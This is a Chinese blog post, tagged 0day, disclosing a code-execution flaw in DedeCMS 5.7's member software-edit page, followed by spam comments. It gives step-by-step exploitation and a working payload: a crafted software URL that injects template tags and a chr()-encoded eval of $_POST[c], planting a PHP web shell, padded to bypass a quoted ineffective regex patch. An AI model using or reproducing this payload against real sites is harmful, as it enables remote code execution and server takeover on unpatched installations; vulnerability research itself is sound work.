【河马】dedecms 5.7member_soft_edit.php代码执行漏洞(gpc:off)



20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))
            {
                ShowMsg("确定软件地址提交正确!", "-1");
                exit;
            }
想问一下,这是神马正则?

任何一个字符都能让其匹配

添加上传软件

本地地址 http://www.hao123.com

其它乱填就行,添加成功后,再次进入修改界面



软件地址改为:
http://www.hao123.com}x{/dede:link}{dede:a text'=x']=0;eval(chr(101).chr(118).chr(97).chr(108).chr(40).chr(34).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(59).chr(34).chr(41).chr(59));// }xxxx{/dede:a}{dede:link}xxx

注意,这里后面多了 xxx ,就是为了绕过这个正则补丁。



然后执行完全没有压力!

后来测试,在GPC OFF跟 ON下写入的地址有所区别,上面是在ON下写入的。

原因你们懂得。

在 filter.inc.php 中,你们不管 GPC ,全过滤了 addslashes。



而且对这样的$svar[$_k]直接返回错误的值了,这个BUG你们看着办吧。
function _FilterAll($fk, &$svar)
{
    global $cfg_notallowstr,$cfg_replacestr;
    if( is_array($svar) )
    {
        foreach($svar as $_k => $_v)
        {
            $svar[$_k] = _FilterAll($fk,$_v);
        }
    }
    else
    {
        if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i", $svar))
        {
            ShowMsg(" $fk has not allow words!",'-1');
            exit();
        }
        if($cfg_replacestr!='')
        {
            $svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);
        }
    }
    return addslashes($svar);
}

/* 对_GET,_POST,_COOKIE进行过滤 */
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        ${$_k} = _FilterAll($_k,$_v);
    }
}





只允许会员下载 该文件只允许会员下载! 登录 | 注册

文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 0day
评论: 64 | 引用: 0 | 查看次数: 7991
Lewis [2015-11-11 01:11 AM]
You've gotten among the best webpages.

Review my site plenty of fish dating site of free dating
Dylan [2015-11-11 01:05 AM]
Great looking internet site. Think you did a whole lot of your very own coding.


My web page justin bieber dating
Sherman [2015-11-10 06:48 AM]
You have very good thing at this point.
Dessie [2015-11-05 06:55 PM]
Superb web page you have there.
Jamey [2015-11-05 09:30 AM]
Thanks, this site is very useful.
Trinidad [2015-11-04 10:08 AM]
Thanks very useful. Will certainly share website with my friends.
Celesta [2015-11-03 08:57 PM]
Appreciate it! This is definitely an remarkable web-site.
Meri [2015-11-01 04:15 PM]
Sustain the excellent work and generating the crowd!
Rich [2015-10-30 06:02 PM]
I adore this site - its so usefull and helpfull.
Naomi [2015-10-29 04:30 AM]
You have got the most effective online websites.
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码
内 容:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭